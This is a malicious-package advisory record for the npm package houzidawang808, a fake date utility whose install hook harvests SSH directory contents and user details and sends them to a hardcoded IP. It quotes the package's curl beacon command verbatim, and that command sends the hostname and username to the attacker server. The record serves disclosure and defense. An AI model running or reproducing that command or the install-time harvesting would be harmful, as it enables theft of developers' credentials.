MAL-2026-5732

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/houzidawang808/MAL-2026-5732.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5732
Published
2026-06-13T06:51:37Z
Modified
2026-06-13T07:31:42.677940805Z
Summary
Malicious code in houzidawang808 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (71d6b96fe99e7f8503cb07df05d6b621dc8e8243fc7288844678d8aff043a654)

The package presents itself as a 'simple date formatting utility' (index.js exports a trivial formatDate wrapper around toLocaleDateString), but ships a postinstall.js that runs automatically on npm install. The postinstall script reads the contents of the installer's ~/.ssh directory via fs.readdirSync, collects os.userInfo() username and platform information, and POSTs the data to https://124.221.154.135/post — a hardcoded bare-IP destination with no documented purpose. Chinese-language comments in the file explicitly describe it as SSH-key theft and C2 exfiltration. The package.json additionally declares a build script curl http://124.221.154.135//pre?h=$(hostname)&u=$(whoami) that beacons hostname/username over plain HTTP to the same attacker IP, confirming the infrastructure. The benign date-utility facade is a cover story for credential-harvesting on installer machines.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006300",
            "versions": [
                "1.0.0"
            ],
            "sha256": "71d6b96fe99e7f8503cb07df05d6b621dc8e8243fc7288844678d8aff043a654",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T06:51:37Z",
            "import_time": "2026-06-13T07:25:38.100755621Z"
        }
    ]
}

Affected packages

npm / houzidawang808

Package

Affected ranges

Affected versions

1.*
1.0.0

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "postinstall.js",
            "sha256": "01e2ae4c999c97c0deac72c7c36bbda5c0d81a95273d4cc5e7dd1dc6dc4596db",
            "tlsh": "033161d148f9ce304f3583952762c62af606fb23a106c640f7d80bea2fb299485d1ced"
        },
        {
            "path": "package.json",
            "sha256": "d828569a33a47d796f060d939f837e86c06d45068ea6ebdd29d0e28e08892e5a",
            "tlsh": "90e07d256e24d8231bf0c6516d744b17b9105f2f127c0c4bb173310861979651469701"
        }
    ],
    "package_integrity": [
        {
            "filename": "houzidawang808-1.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-V3uE+iIR3fj9kGSq1tn6emy364j1wreG9w/vdQPNhqDMoIucFW401Yz+RhYi+RfmaZrA+qgcAvygnZWqj4mJkA==",
                "sha1": "c383a48cc471e749f176a447f1e8b399be26fb59"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/houzidawang808/MAL-2026-5732.json"